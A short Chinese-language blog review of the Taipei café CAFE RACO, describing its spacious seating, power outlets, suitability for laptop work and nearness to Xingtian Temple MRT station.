整體環境非常不錯，空間寬敞，無論是帶筆電工作、讀書，或單純和朋友聊天都很適合。如果當天人不多，基本上可以舒服地待上一段時間；座位下方或旁邊通常也都有插座可用，對需要長時間使用電腦的人很友善。

以交通來說，從捷運行天宮站走過來不遠，對平常在中山區活動，或想找台北捷運附近咖啡廳的人來說很方便。這間店目前給我的印象是環境穩定、功能性高，屬於會想再次回訪的台北咖啡廳。

小結：如果你最近在找台北咖啡廳推薦，又希望店內有 Wi-Fi、有插座、適合工作，CAFE RACO 會是可以先存起來的一間，我要提醒我自己下次要記得點蛋糕來吃看看。之後有再跑新的台北咖啡廳，也會持續補進這篇名單。